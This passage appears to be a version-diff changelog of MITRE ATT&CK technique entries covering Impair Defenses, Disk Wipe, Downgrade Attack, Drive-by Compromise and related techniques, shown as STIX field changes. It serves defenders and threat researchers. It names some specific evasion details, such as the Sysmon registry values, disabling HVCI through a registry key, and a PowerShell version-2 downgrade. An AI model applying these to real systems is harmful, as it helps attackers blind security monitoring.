| processes or services, modifying / deleting Registry keys or | | processes or services, modifying / deleting Registry keys or |
| configuration files so that tools do not operate properly, | | configuration files so that tools do not operate properly, |
| or other methods to interfere with security tools scanning o | | or other methods to interfere with security tools scanning o |
| r reporting information. Adversaries may also disable update | | r reporting information. Adversaries may also disable update |
| s to prevent the latest security patches from reaching tools | | s to prevent the latest security patches from reaching tools |
| on victim systems.(Citation: SCADAfence_ransomware) Advers | | on victim systems.(Citation: SCADAfence_ransomware) Advers |
| aries may also tamper with artifacts deployed and utilized b | | aries may also tamper with artifacts deployed and utilized b |
| y security tools. Security tools may make dynamic changes to | | y security tools. Security tools may make dynamic changes to |
| system components in order to maintain visibility into spec | | system components in order to maintain visibility into spec |
| ific events. For example, security products may load their o | | ific events. For example, security products may load their o |
| wn modules and/or modify those loaded by processes to facili | | wn modules and/or modify those loaded by processes to facili |
| tate data collection. Similar to [Indicator Blocking](https: | | tate data collection. Similar to [Indicator Blocking](https: |
| //attack.mitre.org/techniques/T1562/006), adversaries may un | | //attack.mitre.org/techniques/T1562/006), adversaries may un |
| hook or otherwise modify these features added by tools (espe | | hook or otherwise modify these features added by tools (espe |
| cially those that exist in userland or are otherwise potenti | | cially those that exist in userland or are otherwise potenti |
| ally accessible to adversaries) to avoid detection.(Citation | | ally accessible to adversaries) to avoid detection.(Citation |
| : OutFlank System Calls)(Citation: MDSec System Calls) Adv | | : OutFlank System Calls)(Citation: MDSec System Calls) Alter |
| ersaries may also focus on specific applications such as Sys | | natively, they may add new directories to an endpoint detect |
| mon. For example, the “Start” and “Enable” values in <code>H | | ion and response (EDR) tool’s exclusion list, enabling them |
| KEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\WMI\Autol | | to hide malicious files via [File/Path Exclusions](https://a |
| ogger\EventLog-Microsoft-Windows-Sysmon-Operational</code> m | | ttack.mitre.org/techniques/T1564/012).(Citation: BlackBerry |
| ay be modified to tamper with and potentially disable Sysmon | | WhisperGate 2022)(Citation: Google Cloud Threat Intelligence |
| logging.(Citation: disable_win_evt_logging) On network de | | FIN13 2021) Adversaries may also focus on specific applica |
| vices, adversaries may attempt to skip digital signature ver | | tions such as Sysmon. For example, the “Start” and “Enable” |
| ification checks by altering startup configuration files and | | values in <code>HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\ |
| effectively disabling firmware verification that typically | | Control\WMI\Autologger\EventLog-Microsoft-Windows-Sysmon-Ope |
| occurs at boot.(Citation: Fortinet Zero-Day and Custom Malwa | | rational</code> may be modified to tamper with and potential |
| re Used by Suspected Chinese Actor in Espionage Operation)(C | | ly disable Sysmon logging.(Citation: disable_win_evt_logging |
| itation: Analysis of FG-IR-22-369) In cloud environments, t | | ) On network devices, adversaries may attempt to skip digi |
| ools disabled by adversaries may include cloud monitoring ag | | tal signature verification checks by altering startup config |
| ents that report back to services such as AWS CloudWatch or | | uration files and effectively disabling firmware verificatio |
| Google Cloud Monitor. Furthermore, although defensive tools | | n that typically occurs at boot.(Citation: Fortinet Zero-Day |
| may have anti-tampering mechanisms, adversaries may abuse t | | and Custom Malware Used by Suspected Chinese Actor in Espio |
| ools such as legitimate rootkit removal kits to impair and/o | | nage Operation)(Citation: Analysis of FG-IR-22-369) In clou |
| r disable these tools.(Citation: chasing_avaddon_ransomware) | | d environments, tools disabled by adversaries may include cl |
| (Citation: dharma_ransomware)(Citation: demystifying_ryuk)(C | | oud monitoring agents that report back to services such as A |
| itation: doppelpaymer_crowdstrike) For example, adversaries | | WS CloudWatch or Google Cloud Monitor. Furthermore, althoug |
| have used tools such as GMER to find and shut down hidden pr | | h defensive tools may have anti-tampering mechanisms, advers |
| ocesses and antivirus software on infected systems.(Citation | | aries may abuse tools such as legitimate rootkit removal kit |
| : demystifying_ryuk) Additionally, adversaries may exploit | | s to impair and/or disable these tools.(Citation: chasing_av |
| legitimate drivers from anti-virus software to gain access t | | addon_ransomware)(Citation: dharma_ransomware)(Citation: dem |
| o kernel space (i.e. [Exploitation for Privilege Escalation] | | ystifying_ryuk)(Citation: doppelpaymer_crowdstrike) For exam |
| (https://attack.mitre.org/techniques/T1068)), which may lead | | ple, adversaries have used tools such as GMER to find and sh |
| to bypassing anti-tampering features.(Citation: avoslocker_ | | ut down hidden processes and antivirus software on infected |
| ransomware) | | systems.(Citation: demystifying_ryuk) Additionally, adversa |
| | | ries may exploit legitimate drivers from anti-virus software |
| | | to gain access to kernel space (i.e. [Exploitation for Priv |
| | | ilege Escalation](https://attack.mitre.org/techniques/T1068) |
| | | ), which may lead to bypassing anti-tampering features.(Cita |
| | | tion: avoslocker_ransomware) |
New Mitigations:
Details
dictionary_item_removed| STIX Field | Old value | New Value |
|---|
| x_mitre_defense_bypassed | ['Anti-virus', 'Log analysis', 'Signature-based detection', 'Host intrusion prevention systems', 'File monitoring'] | |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-04-12 21:13:46.640000+00:00 | 2025-04-15 19:58:57.147000+00:00 |
| description | Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.(Citation: SCADAfence_ransomware)
Adversaries may also tamper with artifacts deployed and utilized by security tools. Security tools may make dynamic changes to system components in order to maintain visibility into specific events. For example, security products may load their own modules and/or modify those loaded by processes to facilitate data collection. Similar to [Indicator Blocking](https://attack.mitre.org/techniques/T1562/006), adversaries may unhook or otherwise modify these features added by tools (especially those that exist in userland or are otherwise potentially accessible to adversaries) to avoid detection.(Citation: OutFlank System Calls)(Citation: MDSec System Calls)
Adversaries may also focus on specific applications such as Sysmon. For example, the “Start” and “Enable” values in HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\WMI\Autologger\EventLog-Microsoft-Windows-Sysmon-Operational may be modified to tamper with and potentially disable Sysmon logging.(Citation: disable_win_evt_logging)
On network devices, adversaries may attempt to skip digital signature verification checks by altering startup configuration files and effectively disabling firmware verification that typically occurs at boot.(Citation: Fortinet Zero-Day and Custom Malware Used by Suspected Chinese Actor in Espionage Operation)(Citation: Analysis of FG-IR-22-369)
In cloud environments, tools disabled by adversaries may include cloud monitoring agents that report back to services such as AWS CloudWatch or Google Cloud Monitor.
Furthermore, although defensive tools may have anti-tampering mechanisms, adversaries may abuse tools such as legitimate rootkit removal kits to impair and/or disable these tools.(Citation: chasing_avaddon_ransomware)(Citation: dharma_ransomware)(Citation: demystifying_ryuk)(Citation: doppelpaymer_crowdstrike) For example, adversaries have used tools such as GMER to find and shut down hidden processes and antivirus software on infected systems.(Citation: demystifying_ryuk)
Additionally, adversaries may exploit legitimate drivers from anti-virus software to gain access to kernel space (i.e. [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068)), which may lead to bypassing anti-tampering features.(Citation: avoslocker_ransomware) | Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.(Citation: SCADAfence_ransomware)
Adversaries may also tamper with artifacts deployed and utilized by security tools. Security tools may make dynamic changes to system components in order to maintain visibility into specific events. For example, security products may load their own modules and/or modify those loaded by processes to facilitate data collection. Similar to [Indicator Blocking](https://attack.mitre.org/techniques/T1562/006), adversaries may unhook or otherwise modify these features added by tools (especially those that exist in userland or are otherwise potentially accessible to adversaries) to avoid detection.(Citation: OutFlank System Calls)(Citation: MDSec System Calls) Alternatively, they may add new directories to an endpoint detection and response (EDR) tool’s exclusion list, enabling them to hide malicious files via [File/Path Exclusions](https://attack.mitre.org/techniques/T1564/012).(Citation: BlackBerry WhisperGate 2022)(Citation: Google Cloud Threat Intelligence FIN13 2021)
Adversaries may also focus on specific applications such as Sysmon. For example, the “Start” and “Enable” values in HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\WMI\Autologger\EventLog-Microsoft-Windows-Sysmon-Operational may be modified to tamper with and potentially disable Sysmon logging.(Citation: disable_win_evt_logging)
On network devices, adversaries may attempt to skip digital signature verification checks by altering startup configuration files and effectively disabling firmware verification that typically occurs at boot.(Citation: Fortinet Zero-Day and Custom Malware Used by Suspected Chinese Actor in Espionage Operation)(Citation: Analysis of FG-IR-22-369)
In cloud environments, tools disabled by adversaries may include cloud monitoring agents that report back to services such as AWS CloudWatch or Google Cloud Monitor.
Furthermore, although defensive tools may have anti-tampering mechanisms, adversaries may abuse tools such as legitimate rootkit removal kits to impair and/or disable these tools.(Citation: chasing_avaddon_ransomware)(Citation: dharma_ransomware)(Citation: demystifying_ryuk)(Citation: doppelpaymer_crowdstrike) For example, adversaries have used tools such as GMER to find and shut down hidden processes and antivirus software on infected systems.(Citation: demystifying_ryuk)
Additionally, adversaries may exploit legitimate drivers from anti-virus software to gain access to kernel space (i.e. [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068)), which may lead to bypassing anti-tampering features.(Citation: avoslocker_ransomware) |
| x_mitre_version | 1.5 | 1.6 |
| x_mitre_platforms[5] | Network | Network Devices |
iterable_item_added| STIX Field | Old value | New Value |
|---|
| external_references | | {'source_name': 'BlackBerry WhisperGate 2022', 'description': 'BlackBerry Research and Intelligence Team. (2022, February 3). Threat Spotlight: WhisperGate Wiper Wreaks Havoc in Ukraine. Retrieved March 18, 2025.', 'url': 'https://blogs.blackberry.com/en/2022/02/threat-spotlight-whispergate-wiper-wreaks-havoc-in-ukraine'} |
| external_references | | {'source_name': 'Google Cloud Threat Intelligence FIN13 2021', 'description': 'Van Ta, Jake Nicastro, Rufus Brown, and Nick Richard. (2021, December 7). FIN13: A Cybercriminal Threat Actor Focused on Mexico. Retrieved March 18, 2025.', 'url': 'https://cloud.google.com/blog/topics/threat-intelligence/fin13-cybercriminal-mexico/'} |
| x_mitre_contributors | | Menachem Goldstein |
[T1561.001] Disk Wipe: Disk Content Wipe
Current version: 1.2
Version changed from: 1.1 → 1.2
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-04-16 13:00:33.303000+00:00 | 2025-04-15 19:59:23.834000+00:00 |
| external_references[2]['description'] | Novetta Threat Research Group. (2016, February 24). Operation Blockbuster: Destructive Malware Report. Retrieved March 2, 2016. | Novetta Threat Research Group. (2016, February 24). Operation Blockbuster: Destructive Malware Report. Retrieved November 17, 2024. |
| external_references[2]['url'] | https://web.archive.org/web/20160303200515/https://operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Destructive-Malware-Report.pdf | https://web.archive.org/web/20160303200515/https:/operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Destructive-Malware-Report.pdf |
| x_mitre_version | 1.1 | 1.2 |
iterable_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_platforms | | Network Devices |
iterable_item_removed| STIX Field | Old value | New Value |
|---|
| x_mitre_platforms | Network | |
[T1561.002] Disk Wipe: Disk Structure Wipe
Current version: 1.2
Version changed from: 1.1 → 1.2
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-10-15 16:32:05.064000+00:00 | 2025-04-15 19:58:04.838000+00:00 |
| external_references[4]['description'] | FireEye. (2016, November 30). FireEye Responds to Wave of Destructive Cyber Attacks in Gulf Region. Retrieved January 11, 2017. | FireEye. (2016, November 30). FireEye Responds to Wave of Destructive Cyber Attacks in Gulf Region. Retrieved November 17, 2024. |
| external_references[4]['url'] | https://www.fireeye.com/blog/threat-research/2016/11/fireeye_respondsto.html | https://web.archive.org/web/20210126065851/https://www.fireeye.com/blog/threat-research/2016/11/fireeye_respondsto.html |
| x_mitre_version | 1.1 | 1.2 |
| x_mitre_platforms[3] | Network | Network Devices |
[T1561] Disk Wipe
Current version: 1.2
Version changed from: 1.1 → 1.2
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-04-20 18:16:41.942000+00:00 | 2025-04-15 19:58:09.974000+00:00 |
| external_references[2]['description'] | Novetta Threat Research Group. (2016, February 24). Operation Blockbuster: Destructive Malware Report. Retrieved March 2, 2016. | Novetta Threat Research Group. (2016, February 24). Operation Blockbuster: Destructive Malware Report. Retrieved November 17, 2024. |
| external_references[2]['url'] | https://web.archive.org/web/20160303200515/https://operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Destructive-Malware-Report.pdf | https://web.archive.org/web/20160303200515/https:/operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Destructive-Malware-Report.pdf |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
| x_mitre_version | 1.1 | 1.2 |
| x_mitre_platforms[3] | Network | Network Devices |
[T1078.002] Valid Accounts: Domain Accounts
Current version: 1.5
Version changed from: 1.4 → 1.5
Details
dictionary_item_removed| STIX Field | Old value | New Value |
|---|
| x_mitre_permissions_required | ['User', 'Administrator'] | |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-08-14 14:55:07.432000+00:00 | 2025-04-16 20:37:20.358000+00:00 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
| x_mitre_version | 1.4 | 1.5 |
iterable_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_platforms | | ESXi |
[T1090.004] Proxy: Domain Fronting
Current version: 1.2
Version changed from: 1.1 → 1.2
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-03-30 21:01:52.356000+00:00 | 2025-04-16 20:37:20.863000+00:00 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
| x_mitre_version | 1.1 | 1.2 |
iterable_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_platforms | | ESXi |
[T1568.002] Dynamic Resolution: Domain Generation Algorithms
Current version: 1.2
Version changed from: 1.1 → 1.2
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-10-15 15:55:16.111000+00:00 | 2025-04-15 19:58:07.610000+00:00 |
| x_mitre_version | 1.1 | 1.2 |
iterable_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_platforms | | ESXi |
[T1484] Domain or Tenant Policy Modification
Current version: 3.2
Version changed from: 3.1 → 3.2
Details
dictionary_item_removed| STIX Field | Old value | New Value |
|---|
| x_mitre_defense_bypassed | ['System access controls', 'File system access controls'] | |
| x_mitre_permissions_required | ['Administrator', 'User'] | |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-10-15 15:55:32.946000+00:00 | 2025-04-15 19:59:19.033000+00:00 |
| external_references[10]['description'] | Sygnia. (2020, December). Detection and Hunting of Golden SAML Attack. Retrieved January 6, 2021. | Sygnia. (2020, December). Detection and Hunting of Golden SAML Attack. Retrieved November 17, 2024. |
| external_references[10]['url'] | https://www.sygnia.co/golden-saml-advisory | https://www.sygnia.co/threat-reports-and-advisories/golden-saml-attack/ |
| x_mitre_version | 3.1 | 3.2 |
[T1562.010] Impair Defenses: Downgrade Attack
Current version: 1.3
Version changed from: 1.2 → 1.3
|
|
|---|
| t | Adversaries may downgrade or use a version of system feature | t | Adversaries may downgrade or use a version of system feature |
| s that may be outdated, vulnerable, and/or does not support | | s that may be outdated, vulnerable, and/or does not support |
| updated security controls. Downgrade attacks typically take | | updated security controls. Downgrade attacks typically take |
| advantage of a system’s backward compatibility to force it i | | advantage of a system’s backward compatibility to force it i |
| nto less secure modes of operation. Adversaries may downgr | | nto less secure modes of operation. Adversaries may downgr |
| ade and use various less-secure versions of features of a sy | | ade and use various less-secure versions of features of a sy |
| stem, such as [Command and Scripting Interpreter](https://at | | stem, such as [Command and Scripting Interpreter](https://at |
| tack.mitre.org/techniques/T1059)s or even network protocols | | tack.mitre.org/techniques/T1059)s or even network protocols |
| that can be abused to enable [Adversary-in-the-Middle](https | | that can be abused to enable [Adversary-in-the-Middle](https |
| ://attack.mitre.org/techniques/T1557) or [Network Sniffing]( | | ://attack.mitre.org/techniques/T1557) or [Network Sniffing]( |
| https://attack.mitre.org/techniques/T1040).(Citation: Praeto | | https://attack.mitre.org/techniques/T1040).(Citation: Praeto |
| rian TLS Downgrade Attack 2014) For example, [PowerShell](ht | | rian TLS Downgrade Attack 2014) For example, [PowerShell](ht |
| tps://attack.mitre.org/techniques/T1059/001) versions 5+ inc | | tps://attack.mitre.org/techniques/T1059/001) versions 5+ inc |
| ludes Script Block Logging (SBL) which can record executed s | | ludes Script Block Logging (SBL), which can record executed |
| cript content. However, adversaries may attempt to execute a | | script content. However, adversaries may attempt to execute |
| previous version of PowerShell that does not support SBL wi | | a previous version of PowerShell that does not support SBL w |
| th the intent to [Impair Defenses](https://attack.mitre.org/ | | ith the intent to [Impair Defenses](https://attack.mitre.org |
| techniques/T1562) while running malicious scripts that may h | | /techniques/T1562) while running malicious scripts that may |
| ave otherwise been detected.(Citation: CrowdStrike BGH Ranso | | have otherwise been detected.(Citation: CrowdStrike BGH Rans |
| mware 2021)(Citation: Mandiant BYOL 2018)(Citation: att_def_ | | omware 2021)(Citation: Mandiant BYOL 2018)(Citation: att_def |
| ps_logging) Adversaries may similarly target network traffi | | _ps_logging) Adversaries may similarly target network traff |
| c to downgrade from an encrypted HTTPS connection to an unse | | ic to downgrade from an encrypted HTTPS connection to an uns |
| cured HTTP connection that exposes network data in clear tex | | ecured HTTP connection that exposes network data in clear te |
| t.(Citation: Targeted SSL Stripping Attacks Are Real)(Citati | | xt.(Citation: Targeted SSL Stripping Attacks Are Real)(Citat |
| on: Crowdstrike Downgrade) | | ion: Crowdstrike Downgrade) On Windows systems, adversaries |
| | | may downgrade the boot manager to a vulnerable version that |
| | | bypasses Secure Boot, granting the ability to disable variou |
| | | s operating system security mechanisms.(Citation: SafeBreach |
| | | ) |
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-10-03 16:40:15.445000+00:00 | 2025-04-15 19:58:46.929000+00:00 |
| description | Adversaries may downgrade or use a version of system features that may be outdated, vulnerable, and/or does not support updated security controls. Downgrade attacks typically take advantage of a system’s backward compatibility to force it into less secure modes of operation.
Adversaries may downgrade and use various less-secure versions of features of a system, such as [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059)s or even network protocols that can be abused to enable [Adversary-in-the-Middle](https://attack.mitre.org/techniques/T1557) or [Network Sniffing](https://attack.mitre.org/techniques/T1040).(Citation: Praetorian TLS Downgrade Attack 2014) For example, [PowerShell](https://attack.mitre.org/techniques/T1059/001) versions 5+ includes Script Block Logging (SBL) which can record executed script content. However, adversaries may attempt to execute a previous version of PowerShell that does not support SBL with the intent to [Impair Defenses](https://attack.mitre.org/techniques/T1562) while running malicious scripts that may have otherwise been detected.(Citation: CrowdStrike BGH Ransomware 2021)(Citation: Mandiant BYOL 2018)(Citation: att_def_ps_logging)
Adversaries may similarly target network traffic to downgrade from an encrypted HTTPS connection to an unsecured HTTP connection that exposes network data in clear text.(Citation: Targeted SSL Stripping Attacks Are Real)(Citation: Crowdstrike Downgrade) | Adversaries may downgrade or use a version of system features that may be outdated, vulnerable, and/or does not support updated security controls. Downgrade attacks typically take advantage of a system’s backward compatibility to force it into less secure modes of operation.
Adversaries may downgrade and use various less-secure versions of features of a system, such as [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059)s or even network protocols that can be abused to enable [Adversary-in-the-Middle](https://attack.mitre.org/techniques/T1557) or [Network Sniffing](https://attack.mitre.org/techniques/T1040).(Citation: Praetorian TLS Downgrade Attack 2014) For example, [PowerShell](https://attack.mitre.org/techniques/T1059/001) versions 5+ includes Script Block Logging (SBL), which can record executed script content. However, adversaries may attempt to execute a previous version of PowerShell that does not support SBL with the intent to [Impair Defenses](https://attack.mitre.org/techniques/T1562) while running malicious scripts that may have otherwise been detected.(Citation: CrowdStrike BGH Ransomware 2021)(Citation: Mandiant BYOL 2018)(Citation: att_def_ps_logging)
Adversaries may similarly target network traffic to downgrade from an encrypted HTTPS connection to an unsecured HTTP connection that exposes network data in clear text.(Citation: Targeted SSL Stripping Attacks Are Real)(Citation: Crowdstrike Downgrade) On Windows systems, adversaries may downgrade the boot manager to a vulnerable version that bypasses Secure Boot, granting the ability to disable various operating system security mechanisms.(Citation: SafeBreach) |
| x_mitre_detection | Monitor for commands or other activity that may be indicative of attempts to abuse older or deprecated technologies (ex: powershell –v 2). Also monitor for other abnormal events, such as execution of and/or processes spawning from a version of a tool that is not expected in the environment.
Monitor for Windows event ID (EID) 400, specifically the EngineVersion field which shows the version of PowerShell running and may highlight a malicious downgrade attack.(Citation: inv_ps_attacks)
Monitor network data to detect cases where HTTP is used instead of HTTPS. | Monitor for commands or other activity that may be indicative of attempts to abuse older or deprecated technologies (ex: powershell –v 2). Also monitor for other abnormal events, such as execution of and/or processes spawning from a version of a tool that is not expected in the environment.
Monitor for Windows event ID (EID) 400, specifically the EngineVersion field which shows the version of PowerShell running and may highlight a malicious downgrade attack.(Citation: inv_ps_attacks)
Monitor network data to detect cases where HTTP is used instead of HTTPS.
Monitor executed commands and arguments that may maliciously modify components of a victim environment in order to hinder or disable defensive mechanisms. Bitlocker can be disabled by calling DisableKeyProtectors and setting DisableCount to 0.(Citation: welivesecurity)
Monitor for newly constructed files that may configure system settings to automatically execute a program during system boot or logon to maintain persistence or gain higher-level privileges on compromised systems. Adversaries can construct new files in the EFI System Partition.(Citation: Microsoft Security)(Citation: welivesecurity)
Monitor for changes made to Windows Registry keys and/or values related to services and startup programs that correspond to security tools such as HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender. HVCI (Hypervisor-Protected Code Integrity) can be disabled by modifying the registry key to 0, allowing the system to run custom unsigned kernel code.(Citation: Microsoft Security)(Citation: welivesecurity) |
| x_mitre_version | 1.2 | 1.3 |
iterable_item_added| STIX Field | Old value | New Value |
|---|
| external_references | | {'source_name': 'SafeBreach', 'description': 'Alon Leviev. (2024, August 7). Windows Downdate: Downgrade Attacks Using Windows Updates. Retrieved January 8, 2025.', 'url': 'https://www.safebreach.com/blog/downgrade-attacks-using-windows-updates/'} |
| external_references | | {'source_name': 'welivesecurity', 'description': 'Martin Smolár. (2023, March 1). BlackLotus UEFI bootkit: Myth confirmed. Retrieved February 11, 2025.', 'url': 'https://www.welivesecurity.com/2023/03/01/blacklotus-uefi-bootkit-myth-confirmed/'} |
| external_references | | {'source_name': 'Microsoft Security', 'description': 'Microsoft Incident Response. (2023, April 11). Guidance for investigating attacks using CVE-2022-21894: The BlackLotus campaign. Retrieved February 12, 2025.', 'url': 'https://www.microsoft.com/en-us/security/blog/2023/04/11/guidance-for-investigating-attacks-using-cve-2022-21894-the-blacklotus-campaign/'} |
[T1601.002] Modify System Image: Downgrade System Image
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_attack_spec_version | | 3.2.0 |
dictionary_item_removed| STIX Field | Old value | New Value |
|---|
| x_mitre_permissions_required | ['Administrator'] | |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2020-10-22 17:49:02.660000+00:00 | 2025-04-15 19:59:24.391000+00:00 |
| x_mitre_version | 1.0 | 1.1 |
| x_mitre_platforms[0] | Network | Network Devices |
[T1189] Drive-by Compromise
Current version: 1.7
Version changed from: 1.6 → 1.7
|
|
|---|
| t | Adversaries may gain access to a system through a user visit | t | Adversaries may gain access to a system through a user visit |
| ing a website over the normal course of browsing. With this | | ing a website over the normal course of browsing. Multiple w |
| technique, the user's web browser is typically targeted for | | ays of delivering exploit code to a browser exist (i.e., [Dr |
| exploitation, but adversaries may also use compromised websi | | ive-by Target](https://attack.mitre.org/techniques/T1608/004 |
| tes for non-exploitation behavior such as acquiring [Applica | | )), including: * A legitimate website is compromised, allow |
| tion Access Token](https://attack.mitre.org/techniques/T1550 | | ing adversaries to inject malicious code * Script files serv |
| /001). Multiple ways of delivering exploit code to a browse | | ed to a legitimate website from a publicly writeable cloud s |
| r exist (i.e., [Drive-by Target](https://attack.mitre.org/te | | torage bucket are modified by an adversary * Malicious ads a |
| chniques/T1608/004)), including: * A legitimate website is | | re paid for and served through legitimate ad providers (i.e. |
| compromised where adversaries have injected some form of mal | | , [Malvertising](https://attack.mitre.org/techniques/T1583/0 |
| icious code such as JavaScript, iFrames, and cross-site scri | | 08)) * Built-in web application interfaces that allow user-c |
| pting * Script files served to a legitimate website from a p | | ontrollable content are leveraged for the insertion of malic |
| ublicly writeable cloud storage bucket are modified by an ad | | ious scripts or iFrames (e.g., cross-site scripting) Browse |
| versary * Malicious ads are paid for and served through legi | | r push notifications may also be abused by adversaries and l |
| timate ad providers (i.e., [Malvertising](https://attack.mit | | everaged for malicious code injection via [User Execution](h |
| re.org/techniques/T1583/008)) * Built-in web application int | | ttps://attack.mitre.org/techniques/T1204). By clicking "allo |
| erfaces are leveraged for the insertion of any other kind of | | w" on browser push notifications, users may be granting a we |
| object that can be used to display web content or contain a | | bsite permission to run JavaScript code on their browser.(Ci |
| script that executes on the visiting client (e.g. forum pos | | tation: Push notifications - viruspositive)(Citation: push n |
| ts, comments, and other user controllable web content). Oft | | otification -mcafee)(Citation: push notifications - malwareb |
| en the website used by an adversary is one visited by a spec | | ytes) Often the website used by an adversary is one visited |
| ific community, such as government, a particular industry, o | | by a specific community, such as government, a particular i |
| r region, where the goal is to compromise a specific user or | | ndustry, or a particular region, where the goal is to compro |
| set of users based on a shared interest. This kind of targe | | mise a specific user or set of users based on a shared inter |
| ted campaign is often referred to a strategic web compromise | | est. This kind of targeted campaign is often referred to a s |
| or watering hole attack. There are several known examples o | | trategic web compromise or watering hole attack. There are s |
| f this occurring.(Citation: Shadowserver Strategic Web Compr | | everal known examples of this occurring.(Citation: Shadowser |
| omise) Typical drive-by compromise process: 1. A user visi | | ver Strategic Web Compromise) Typical drive-by compromise p |
| ts a website that is used to host the adversary controlled c | | rocess: 1. A user visits a website that is used to host the |
| ontent. 2. Scripts automatically execute, typically searchin | | adversary controlled content. 2. Scripts automatically exec |
| g versions of the browser and plugins for a potentially vuln | | ute, typically searching versions of the browser and plugins |
| erable version. * The user may be required to assist in | | for a potentially vulnerable version. The user may be requi |
| this process by enabling scripting or active website compon | | red to assist in this process by enabling scripting, notific |
| ents and ignoring warning dialog boxes. 3. Upon finding a vu | | ations, or active website components and ignoring warning di |
| lnerable version, exploit code is delivered to the browser. | | alog boxes. 3. Upon finding a vulnerable version, exploit co |
| 4. If exploitation is successful, then it will give the adve | | de is delivered to the browser. 4. If exploitation is succes |
| rsary code execution on the user's system unless other prote | | sful, the adversary will gain code execution on the user's s |
| ctions are in place. * In some cases a second visit to t | | ystem unless other protections are in place. In some cases, |
| he website after the initial scan is required before exploit | | a second visit to the website after the initial scan is requ |
| code is delivered. Unlike [Exploit Public-Facing Applicati | | ired before exploit code is delivered. Unlike [Exploit Publ |
| on](https://attack.mitre.org/techniques/T1190), the focus of | | ic-Facing Application](https://attack.mitre.org/techniques/T |
| this technique is to exploit software on a client endpoint | | 1190), the focus of this technique is to exploit software on |
| upon visiting a website. This will commonly give an adversar | | a client endpoint upon visiting a website. This will common |
| y access to systems on the internal network instead of exter | | ly give an adversary access to systems on the internal netwo |
| nal systems that may be in a DMZ. Adversaries may also use | | rk instead of external systems that may be in a DMZ. |
| compromised websites to deliver a user to a malicious applic | | |
| ation designed to [Steal Application Access Token](https://a | | |
| ttack.mitre.org/techniques/T1528)s, like OAuth tokens, to ga | | |
| in access to protected applications and information. These m | | |
| alicious applications have been delivered through popups on | | |
| legitimate websites.(Citation: Volexity OceanLotus Nov 2017) | | |
New Mitigations:
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-10-15 15:55:47.494000+00:00 | 2025-04-15 19:59:12.900000+00:00 |
| description | Adversaries may gain access to a system through a user visiting a website over the normal course of browsing. With this technique, the user's web browser is typically targeted for exploitation, but adversaries may also use compromised websites for non-exploitation behavior such as acquiring [Application Access Token](https://attack.mitre.org/techniques/T1550/001).
Multiple ways of delivering exploit code to a browser exist (i.e., [Drive-by Target](https://attack.mitre.org/techniques/T1608/004)), including:
* A legitimate website is compromised where adversaries have injected some form of malicious code such as JavaScript, iFrames, and cross-site scripting
* Script files served to a legitimate website from a publicly writeable cloud storage bucket are modified by an adversary
* Malicious ads are paid for and served through legitimate ad providers (i.e., [Malvertising](https://attack.mitre.org/techniques/T1583/008))
* Built-in web application interfaces are leveraged for the insertion of any other kind of object that can be used to display web content or contain a script that executes on the visiting client (e.g. forum posts, comments, and other user controllable web content).
Often the website used by an adversary is one visited by a specific community, such as government, a particular industry, or region, where the goal is to compromise a specific user or set of users based on a shared interest. This kind of targeted campaign is often referred to a strategic web compromise or watering hole attack. There are several known examples of this occurring.(Citation: Shadowserver Strategic Web Compromise)
Typical drive-by compromise process:
1. A user visits a website that is used to host the adversary controlled content.
2. Scripts automatically execute, typically searching versions of the browser and plugins for a potentially vulnerable version.
* The user may be required to assist in this process by enabling scripting or active website components and ignoring warning dialog boxes.
3. Upon finding a vulnerable version, exploit code is delivered to the browser.
4. If exploitation is successful, then it will give the adversary code execution on the user's system unless other protections are in place.
* In some cases a second visit to the website after the initial scan is required before exploit code is delivered.
Unlike [Exploit Public-Facing Application](https://attack.mitre.org/techniques/T1190), the focus of this technique is to exploit software on a client endpoint upon visiting a website. This will commonly give an adversary access to systems on the internal network instead of external systems that may be in a DMZ.
